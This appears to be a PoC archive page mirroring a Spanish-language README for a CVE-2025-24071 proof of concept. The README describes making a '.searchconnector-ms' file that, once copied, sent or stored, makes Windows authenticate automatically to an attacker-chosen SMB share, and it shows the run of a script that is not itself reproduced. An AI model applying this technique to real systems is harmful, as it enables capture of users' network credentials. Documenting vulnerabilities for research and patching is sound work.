Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24071 PoC — Microsoft Windows File Explorer Spoofing Vulnerability

Source
Associated Vulnerability
Title:Microsoft Windows File Explorer Spoofing Vulnerability (CVE-2025-24071)
Description:Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.
Description
Alternativa CVE-2025-24071_PoC
Readme
# CVE-2025-24071_PoCExtra
Alternativa CVE-2025-24071_PoC

Codigo Original
https://github.com/0x6rss/CVE-2025-24071_PoC

Al realizar unas pruebas con otra extensión parecida probe con ".searchconnector-ms" usando la misma estructura pero el inconveniente del primer Poc también afectaba.

python poc2.py

Ingrese la dirección IP del recurso compartido:
192.168.88.33

Archivo 'network_share.searchconnector-ms' creado con la IP 192.168.88.33.

y al enviar, copiar o almacenar el archivo automáticamente realiza la autentificación en el recurso SMB.

//Vmware
Al momento de realizar las pruebas solo copiando el archivo a una máquina virtual este realizaba la autenticación al recurso SMB.



https://github.com/user-attachments/assets/2b71cc32-5010-4840-bf13-bd134c305d12


File Snapshot

[4.0K] /data/pocs/34743784269c7542c9145dff9408d6aa07715ffa ├── [ 950] poc2.py └── [ 780] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →